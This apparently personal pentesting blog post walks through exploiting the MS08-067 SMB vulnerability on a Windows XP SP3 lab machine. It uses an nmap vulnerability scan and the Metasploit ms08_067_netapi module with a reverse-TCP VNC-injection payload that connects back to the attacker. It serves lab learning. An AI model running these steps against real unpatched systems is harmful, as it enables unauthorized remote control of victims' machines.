본문 바로가기

Research/Pentesting

[Pentesting] XP sp3 Remote Exploit with ms08_067

- XP sp3 Remote Exploit with ms08_067

 

Vulnerability : MS08_067

 

PayLoadwindows/vcninject/reverse_tcp

 

Platforms : Windows 

 

Architectures : x86

 

Target : 192.168.233.130 ( Windows XP sp3 )

 

Attacker : 192.168.233.129 ( Linux BackTrack5-R3 )

 

 

- Process -

This time we will exploit Windows XP sp3 with ms08_067 vulnerability

MS08_067 :

When the system is requested RPC request, it allows Remote Code Executing.

Windows 2000, Windows XP, Windows Server 2003 has this Culnerability.

SO Hacker can execute any command to victim's pc without any verification.

 
1. First, we need to check the PC which might have MS08_067 Vuln with Nmap tool. 

   Because, If the vuln were already patched, we can't exploit.

 

 

 Command : nmap -sS -A --script=smb-check-vulns -PO [Victim's IP]
 
In this case, we can't exploit... so..
 
2. And We will use module called "ms08_067_netapi"
 
search ms08_067

 

3.
USe it!
Cmd : use exploit/windows/smb/ms08_067_netapi
 
4. Setting Payload time!
This time we will use windows/vncinject/reverse_tcp payload.
 
Setting LHOST ( my ip ) LPORT ( MY port ) RPORT ( 445 )
        RHOST ( victim ip )
 

 

- Exploit Success!

 

if success at exploit, u can see vnc screen on your screen
- if u can't see vnc screen even success at exploit, vnc isn't installed on ur pc 

 

 

- End